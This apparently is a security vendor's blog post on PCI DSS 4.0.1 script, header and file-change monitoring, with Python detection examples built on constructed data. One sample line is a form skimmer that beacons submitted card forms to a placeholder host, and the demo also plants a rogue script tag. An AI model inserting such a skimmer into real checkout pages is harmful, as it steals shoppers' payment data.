
PCI 4.0.1 - Complying with 6.4.3, 11.6.1 AND 11.5.2

Benjamin Hosack
May 1
4 min read

Tags: Indicators of Compromise

Understanding PCI DSS 4.0.1 and How ThreatView Can Help

What is the PCI DSS?

The Payment Card Industry Data Security Standard (PCI DSS) is a set of security requirements for protecting payment card data wherever it is stored, processed or transmitted. Maintained by the PCI Security Standards Council, the standard aims to reduce data theft and fraud in debit and credit card transactions.

PCI DSS 4.0.1 applies to all entities involved with cardholder data (CHD) and sensitive authentication data (SAD), including:

  • Merchants
  • Processors
  • Acquirers
  • Issuers
  • Service providers.

Recent Updates to PCI DSS 4.0.1 - for eCommerce Merchants

The PCI Security Standards Council recently clarified how requirements 6.4.3 and 11.6.1 apply to eCommerce merchants. The clarification focuses on merchants that embed a third-party payment form in an inline frame (iframe): the merchant page that hosts the iframe is itself a payment page, so the scripts on it and the HTTP headers it is served with fall within these requirements. The Council also removed 6.4.3 and 11.6.1 from Self-Assessment Questionnaire A, but added an eligibility condition that SAQ A merchants confirm their site is not susceptible to attacks from scripts that could affect the merchant's eCommerce systems. In other words, SAQ A merchants do not have to validate these controls in their SAQ, but they still have to make sure the scripts on their checkout pages cannot be abused.

Requirement 6.4.3: Managing Third-Party Scripts

This requirement covers every script loaded and executed in the consumer's browser on a payment page, first-party as well as third-party. The entity must have:

  • A method to confirm that each script is authorised
  • A method to assure the integrity of each script (for example, Subresource Integrity hashes, or hash-based monitoring of the payload actually served)
  • An inventory of all scripts, with a written business or technical justification for each.

While the implementation details are flexible, ThreatView simplifies compliance by:

  • Automatically, in real-time, maintaining an inventory across all pages, including payment pages
  • Displaying script payloads for each request
  • Monitoring code changes and updates
  • Alerting you to potentially malicious actions or unauthorised changes
  • Monitoring in real time, with reports available for any date in the prior 12 months to support your PCI DSS compliance evidence.

PCI 6.4.3 compliance in ThreatView: script inventory, monitoring and reporting

Requirement 11.6.1: Monitoring HTTP Headers for Changes

This requirement is more technically demanding. It calls for a change- and tamper-detection mechanism that:

  • Alerts personnel to unauthorised modification (including indicators of compromise, changes, additions and deletions) of the security-impacting HTTP headers and the script contents of payment pages, as received by the consumer's browser
  • Is configured to evaluate the received HTTP headers and payment pages
  • Performs these functions at least weekly, or at the frequency defined in the entity's targeted risk analysis (carried out per Requirement 12.3.1).

These requirements can be challenging to meet manually, especially given the dynamic nature of third-party JavaScript.

ThreatView addresses this by:

  • Monitoring all HTTP headers served with your pages and alerting on changes to them.
  • Generating compliance reports on demand for any dates within the past 12 months.
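To make the 6.4.3 and 11.6.1 mechanics concrete, here is a small baseline-and-compare check written for this article. It is an added example, not ThreatView code: it inventories the scripts on a payment page as received, hashes each script body, verifies any Subresource Integrity attribute against the body actually served, and diffs both the inventory and the security-impacting response headers against a stored baseline. The page, script bodies and headers are constructed inline; shop.example and cdn-stats.example.net are placeholder hosts, and the authorised set stands in for the written inventory 6.4.3 requires.

```python
import base64
import hashlib
from html.parser import HTMLParser

# Security-impacting response headers to watch (a starting set; extend per your risk analysis).
SECURITY_HEADERS = ("content-security-policy", "strict-transport-security",
                    "x-frame-options", "x-content-type-options", "referrer-policy")


class ScriptCollector(HTMLParser):
    """Collect every <script> element: src URL, integrity attribute and inline body."""
    def __init__(self):
        super().__init__()
        self.scripts, self._attrs, self._buf = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._attrs, self._buf = dict(attrs), []

    def handle_data(self, data):
        if self._attrs is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._attrs is not None:
            self.scripts.append({"src": self._attrs.get("src"), "integrity": self._attrs.get("integrity"),
                                 "body": "".join(self._buf)})
            self._attrs = None


def sri_hash(body: bytes) -> str:
    """Subresource Integrity value (sha256, base64) for a script body."""
    return "sha256-" + base64.b64encode(hashlib.sha256(body).digest()).decode()


def snapshot(html, fetched, headers):
    """What the browser received: sha256 of each script body, scripts whose SRI attribute no
    longer matches their body, and the response headers. `fetched` maps src URL -> bytes served;
    a real monitor fetches from the shopper's vantage point, not the server's disk. Inline scripts
    are keyed by order among inline scripts, so an edit reports as MODIFIED, not REMOVED+ADDED."""
    parser = ScriptCollector()
    parser.feed(html)
    scripts, sri_mismatch, inline_n = {}, [], 0
    for s in parser.scripts:
        if s["src"]:
            key, body = s["src"], fetched.get(s["src"], b"")
        else:
            key, body, inline_n = f"inline#{inline_n}", s["body"].encode(), inline_n + 1
        scripts[key] = hashlib.sha256(body).hexdigest()
        if s["integrity"] and s["integrity"] != sri_hash(body):
            sri_mismatch.append(key)
    return {"scripts": scripts, "sri_mismatch": sri_mismatch,
            "headers": {k.lower(): v for k, v in headers.items()}}


def compare(baseline, current, authorised):
    """Findings to alert on: script added/removed/modified or not in the authorised inventory,
    SRI mismatch, security header added/removed/changed."""
    findings, b, c = [], baseline["scripts"], current["scripts"]
    for key, digest in c.items():
        if key not in b:
            findings.append(("SCRIPT_ADDED", key))
        elif b[key] != digest:
            findings.append(("SCRIPT_MODIFIED", key))
        if not key.startswith("inline#") and key not in authorised:
            findings.append(("SCRIPT_UNAUTHORISED", key))
    findings += [("SCRIPT_REMOVED", key) for key in b if key not in c]
    findings += [("SRI_MISMATCH", key) for key in current["sri_mismatch"]]
    bh, ch = baseline["headers"], current["headers"]
    for h in SECURITY_HEADERS:
        if h in bh and h not in ch:
            findings.append(("HEADER_REMOVED", h))
        elif h in ch and h not in bh:
            findings.append(("HEADER_ADDED", h))
        elif h in bh and bh[h] != ch[h]:
            findings.append(("HEADER_CHANGED", h))
    return findings


# Constructed sample data; shop.example and cdn-stats.example.net are placeholder hosts.
CHECKOUT = "https://shop.example/js/checkout.js"
CHECKOUT_V1 = b"function pay(f){return fetch('/api/pay',{method:'POST',body:new FormData(f)})}"
# The same file after a skimmer was appended server-side.
CHECKOUT_V2 = CHECKOUT_V1 + (b";document.addEventListener('submit',e=>navigator.sendBeacon("
                             b"'https://cdn-stats.example.net/c',new FormData(e.target)))")
ROGUE = "https://cdn-stats.example.net/t.js"
AUTHORISED = {CHECKOUT}  # the written, justified script inventory required by 6.4.3


def page(extra=""):
    # integrity is computed from V1; an intruder editing the file server-side leaves it stale
    return (f'<html><head><script src="{CHECKOUT}" integrity="{sri_hash(CHECKOUT_V1)}"></script>'
            f'{extra}</head><body><script>window.cfg={{pk:"pk_live_redacted"}};</script></body></html>')


def demo():
    baseline = snapshot(page(), {CHECKOUT: CHECKOUT_V1}, {"Content-Security-Policy": "script-src 'self'",
                        "Strict-Transport-Security": "max-age=31536000", "X-Frame-Options": "DENY"})
    current = snapshot(page(f'<script src="{ROGUE}"></script>'), {CHECKOUT: CHECKOUT_V2, ROGUE: b"/* loader */"},
                       {"Content-Security-Policy": "script-src 'self' https://cdn-stats.example.net",
                        "Strict-Transport-Security": "max-age=31536000"})
    return compare(baseline, current, AUTHORISED)
```

Running demo() reports the modified checkout.js, the added and unauthorised loader script, the stale SRI attribute that no longer matches the served body, the loosened Content-Security-Policy and the removed X-Frame-Options header. Two points matter in practice: fetch scripts from outside your own network, because a server-side view will not see conditional or geo-targeted payloads, and keep the baseline and authorised inventory somewhere the web server's user cannot write.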

Beyond Compliance: A Comprehensive Approach

While PCI DSS focuses on the payment pages, we expect these controls to drive change in the attacker tactics and so we strongly recommend monitoring of key security data points across your entire website.  

ThreatView provides this comprehensive security by:

  • Tracking changes across all pages (PCI 11.5.2)
  • Monitoring for eCommerce-specific threats - ThreatView has one of the most comprehensive eCommerce threat detection capabilities in the industry
  • Supporting diagnostics and enabling rapid response when issues arise - for example, showing exactly what changed, with the ability to roll those changes back and quickly regain control.

Requirement 11.5.2: File Integrity Monitoring (FIM) for eCommerce Websites, also known as File Change Monitoring

One of the most challenging PCI requirements for an eCommerce merchant to implement is File Integrity Monitoring (FIM). In our experience (including over 16 years of Foregenix forensic experience) very few eCommerce merchants manage to implement an effective FIM control, mainly because it is hard to implement and then to maintain: a store's code, templates and configuration all have to be covered, while the constantly changing cache, session and log directories generate noise unless they are excluded. There are also few FIM solutions that support the eCommerce industry, and none (apart from ThreatView Advanced Edition, as far as we are aware) that integrate with robust threat detection capabilities.

However, the value that a robust FIM system can bring an eCommerce business is huge - especially when battling an intruder/cyber criminal.  A good FIM solution will enable an eCommerce business to track all changes made to their website, particularly the insertion of malware.  What else was changed, what other bits of code (beyond the digital skimmer) may have been introduced by the attacker?  

A good FIM solution will help an eCommerce business identify those changes and enable them to be "undone", QUICKLY.  Time to resolution is the key - securing the site, protecting client data, and reducing the time (and cost) of searching for the small changes that a criminal may have introduced - the needles in the haystack.  A good FIM solution will show  those changes quickly.

This is exactly what ThreatView Advanced Edition provides: comprehensive File Integrity Monitoring for eCommerce sites, useful at a forensic level for managing and mitigating cyber attacks, and an extremely useful tool for a team under pressure to defend an online business.

It is also why file integrity monitoring is a PCI DSS requirement. Requirement 11.5.2 calls for a change-detection mechanism (for example, FIM tools) that alerts personnel to unauthorised modification of critical files, including changes, additions and deletions, and that performs critical file comparisons at least once weekly.

File Change Monitoring PCI 11.5.2

ThreatView Advanced Edition takes care of PCI 11.5.2.
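For readers who want to see what a minimal 11.5.2-style change-detection pass looks like, here is an added example written for this article (not ThreatView code). It hashes every regular file under a store's web root, excludes the high-churn cache, session and log directories, seals the baseline with an HMAC so that an intruder who can write as the web user cannot quietly regenerate it, and then reports added, deleted and modified files. The store layout, the simulated intrusion and the HMAC key are constructed for the demo; in practice the key and the sealed baseline would live off the web host.

```python
import hashlib
import hmac
import json
import tempfile
from pathlib import Path

# Directories that churn constantly on a typical store (caches, sessions, logs).
# Excluding them keeps the weekly comparison readable; never exclude code,
# templates or configuration, which is where skimmers and backdoors land.
DEFAULT_EXCLUDE = ("var/cache", "var/session", "var/log")


def file_digest(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: str, exclude=DEFAULT_EXCLUDE) -> dict:
    """Map relative path -> [sha256, mode, size] for every regular file under root."""
    root_p, entries = Path(root), {}
    for p in sorted(root_p.rglob("*")):
        rel = p.relative_to(root_p).as_posix()
        if not p.is_file() or any(rel == e or rel.startswith(e + "/") for e in exclude):
            continue
        st = p.stat()
        entries[rel] = [file_digest(p), oct(st.st_mode & 0o777), st.st_size]
    return entries


def compare(baseline: dict, current: dict) -> dict:
    """Paths added, deleted, or modified (content, permission or size change)."""
    return {"added": sorted(set(current) - set(baseline)),
            "deleted": sorted(set(baseline) - set(current)),
            "modified": sorted(p for p in baseline.keys() & current.keys()
                               if baseline[p] != current[p])}


def seal(baseline: dict, key: bytes) -> bytes:
    """Serialise the baseline with an HMAC: a baseline rewritten by an intruder fails unseal()."""
    body = json.dumps(baseline, sort_keys=True).encode()
    return body + b"\n" + hmac.new(key, body, hashlib.sha256).hexdigest().encode()


def unseal(blob: bytes, key: bytes) -> dict:
    body, _, tag = blob.rpartition(b"\n")
    if not hmac.compare_digest(hmac.new(key, body, hashlib.sha256).hexdigest().encode(), tag):
        raise ValueError("baseline integrity check failed")
    return json.loads(body)


def run_demo() -> dict:
    """Constructed store layout: take a sealed baseline, simulate an intrusion, compare."""
    with tempfile.TemporaryDirectory() as root:
        r = Path(root)
        files = {
            "app/design/frontend/Shop/theme/templates/checkout/form.phtml": '<form id="pay"></form>\n',
            "app/etc/env.php": "<?php return ['db' => []];\n",
            "pub/static/js/checkout.js": "function pay(){}\n",
            "var/cache/page.bin": "cache v1",
        }
        for rel, content in files.items():
            (r / rel).parent.mkdir(parents=True, exist_ok=True)
            (r / rel).write_text(content)
        key = b"baseline-hmac-key"  # assumption: held off the web host, e.g. by the monitoring service
        sealed = seal(snapshot(root), key)

        # Simulated intrusion: skimmer tag appended to the checkout template, PHP file
        # dropped in the media directory, a config file deleted, plus normal cache churn.
        tpl = r / "app/design/frontend/Shop/theme/templates/checkout/form.phtml"
        tpl.write_text(tpl.read_text() + '<script src="https://cdn-stats.example.net/t.js"></script>\n')
        (r / "pub/media").mkdir(parents=True)
        (r / "pub/media/logo.php").write_text("<?php /* placeholder for a dropped backdoor */\n")
        (r / "app/etc/env.php").unlink()
        (r / "var/cache/page.bin").write_text("cache v2")

        return compare(unseal(sealed, key), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The comparison surfaces only the three changes that matter (the edited template, the new PHP file under pub/media and the deleted env.php) while the cache rewrite is filtered out. A PHP file appearing under a media or upload directory is exactly the kind of "other bit of code" worth chasing alongside the skimmer itself.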

How ThreatView Compares to Alternatives

Many traditional solutions focus on ticking compliance boxes rather than delivering robust security. Common approaches and their limitations:

Crawler-based scanning: may miss hidden scripts and sophisticated database-driven attacks.

Content Security Policies (CSPs): focus on script sources rather than payloads; struggle to detect a breached but allowed source, or to monitor dynamic script behaviour.

Client-side JS detection ("agents"): set up traps that sophisticated attackers can detect and bypass; often miss dynamic or user-specific threats.

The ThreatView Advantage

Drawing on 20 years of experience in PCI forensic investigations, ThreatView offers a multi-layered approach that combines:

  • Industry-leading e-commerce threat intelligence
  • Forensic-level file change monitoring (PCI 11.5.2)
  • Real-time checkout monitoring (PCI 6.4.3, 11.6.1)
  • Comprehensive threat detection across files, databases, and external connections

Our free tier supports PCI DSS 6.4.3 compliance, while ThreatView Advanced Edition provides comprehensive monitoring that supports requirements 6.4.3, 11.5.2, and 11.6.1 - and comes with a breach protection warranty.

Contact us today to learn more about how ThreatView can help secure your eCommerce environment while ensuring PCI DSS compliance.
